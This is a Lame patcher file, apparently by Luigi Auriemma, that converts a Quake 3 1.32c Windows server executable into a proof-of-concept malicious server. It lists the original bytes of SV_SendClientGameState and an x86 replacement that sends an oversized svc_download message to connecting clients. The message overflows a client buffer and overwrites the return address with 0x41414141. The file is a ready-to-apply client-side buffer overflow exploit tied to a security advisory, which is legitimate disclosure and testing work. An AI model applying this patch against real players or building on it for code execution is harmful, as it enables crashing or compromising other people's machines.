====================================================================================
#
# this file has been created for the Lame patcher program available for both *nix
# and Windows platforms.
# You need this program for continuing the patching of your files:
#
#   http://aluigi.org/mytoolz.htm#lpatch
#
# Quick step-by-step
# - launch lpatch.exe
# - select this q3cbof.lpatch file
# - read the message windows and click yes
# - select the quake3.exe file to patch
# - read the message windows to know if everything has been patched correctly
# - test your client using this malicious server executable

TITLE
    q3cbof proof-of-concept for Quake 3 1.32c Windows 0.1
    by Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:    aluigi.org

INTRO
    Advisory:
    .
    . http://aluigi.org/adv/q3cbof-adv.txt
    .
    This patch transforms a Windows Quake 3 1.32c executable in a proof-of-concept
    for testing the above bug: any client which will try to connect to this server
    will crash with the return address overwritten by 0x41414141.

FILE
    quake3.exe

RVA
    00400000

BYTES_ORIGINAL              ; SV_SendClientGameState // send the gamestate
    8D 44 24 34 6A 02 50 E8
    BC 60 FF FF 8B 8E 04 04
    01 00 51 8D 54 24 40 52
    E8 1B 61 FF FF 83 C4 3C
    33 FF 8D 9B 00 00 00 00
    8B 04 BD 44 56 96 00 80
    38 00 74 2C 8D 4C 24 08
    6A 03 51 E8 88 60 FF FF
    8D 54 24 10 57 52 E8 CD
    60 FF FF 8B 04 BD 44 56
    96 00 50 8D 4C 24 1C 51
    E8 CB 61 FF FF 83 C4 18
    47 81 FF 00             ; ...

BYTES_PATCH
    50                      ; *** use this stuff for pointing &msg to [esp+3c]

    6a 06                   ; push svc_download
    8D 44 24 3c         50  ; push &msg
    e8 ^00423550            ; call MSG_WriteByte

    6a ff                   ; push -1
    8D 44 24 44         50  ; push &msg
    e8 ^004235A0            ; call MSG_WriteShort

    68 |00004020            ; push 16384 + 32
    8D 44 24 4c         50  ; push &msg
    e8 ^004235A0            ; call MSG_WriteShort

    33 db                   ; for(i = 0;
        6a 00               ; push 0x00
        8D 44 24 54     50  ; push &msg
        e8 ^00423550        ; call MSG_WriteByte
        58                  ; pop eax
        58                  ; pop eax
    43                      ; i++
    81 fb |4000             ; i < 16384
    7c e9

    33 db                   ; for(i = 0;    // return address
        6a 41               ; push 'A'
        8D 44 24 54     50  ; push &msg
        e8 ^00423550        ; call MSG_WriteByte
        58                  ; pop eax
        58                  ; pop eax
    43                      ; i++
    81 fb |20               ; i < 32
    7c e9

    56                      ; push client
    8D 44 24 54         50  ; push &msg
    e8 ^004351B0            ; call SV_SendMessageToClient

    83 c4 4c                ; free stack and return
    58                      ; *** use this stuff for adjusting the stack
    e9 ^0042D594

====================================================================================